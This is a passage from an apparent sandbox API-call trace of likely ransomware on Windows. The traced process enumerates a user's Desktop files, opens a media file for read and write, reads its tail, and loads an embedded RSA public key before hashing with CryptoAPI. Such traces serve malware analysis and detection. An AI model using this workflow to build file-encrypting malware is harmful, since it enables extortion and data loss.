hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.115] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0233.116] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fd0b10, ftCreationTime.dwHighDateTime=0x1d5e771, ftLastAccessTime.dwLowDateTime=0x5a82fbc0, ftLastAccessTime.dwHighDateTime=0x1d5ddcf, ftLastWriteTime.dwLowDateTime=0x5a82fbc0, ftLastWriteTime.dwHighDateTime=0x1d5ddcf, nFileSizeHigh=0x0, nFileSizeLow=0xbb81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JnCykkanbvIZuzN.gif", cAlternateFileName="JNCYKK~1.GIF")) returned 0 [0233.116] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.117] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.117] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\") returned="74 ZPVMU\\" [0233.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0233.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.117] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.117] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.117] PathFindFileNameW (pszPath="") returned="" [0233.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd766b20, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0x334a4df0, ftLastAccessTime.dwHighDateTime=0x1d5dea7, ftLastWriteTime.dwLowDateTime=0x334a4df0, ftLastWriteTime.dwHighDateTime=0x1d5dea7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.118] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd766b20, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0x334a4df0, ftLastAccessTime.dwHighDateTime=0x1d5dea7, ftLastWriteTime.dwLowDateTime=0x334a4df0, ftLastWriteTime.dwHighDateTime=0x1d5dea7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.118] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e55fc0, ftCreationTime.dwHighDateTime=0x1d5df4e, ftLastAccessTime.dwLowDateTime=0x60692bd0, ftLastAccessTime.dwHighDateTime=0x1d5dec0, ftLastWriteTime.dwLowDateTime=0x60692bd0, ftLastWriteTime.dwHighDateTime=0x1d5dec0, nFileSizeHigh=0x0, nFileSizeLow=0x8e8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0FzPFdGAHuuuKllKc sv.flv", cAlternateFileName="0FZPFD~1.FLV")) returned 1 [0233.118] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\0FzPFdGAHuuuKllKc sv.flv") returned=".flv" [0233.118] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\0FzPFdGAHuuuKllKc sv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\74 zpvmu\\0fzpfdgahuuukllkc sv.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.118] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=36493) returned 1 [0233.118] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.121] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8e67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.121] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.124] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x8e8d, lpOverlapped=0x0) returned 1 [0233.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.125] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0233.126] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.126] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.126] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.126] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.126] GetLastError () returned 0x0 [0233.127] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.127] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0233.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.127] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.127] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.127] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e90) returned 0x37c2278 [0233.127] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb5d0 [0233.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb618 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee328 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.128] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee370 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee358 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0233.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.129] GetCurrentThreadId () returned 0x314 [0233.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9980 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.130] GetCurrentThreadId () returned 0x314 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3a0 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee388 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee3e8 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee388 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee388 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3a0 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37b5b70 [0233.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5d80 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5f98 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d80 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5f98 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee388 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb618 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.134] 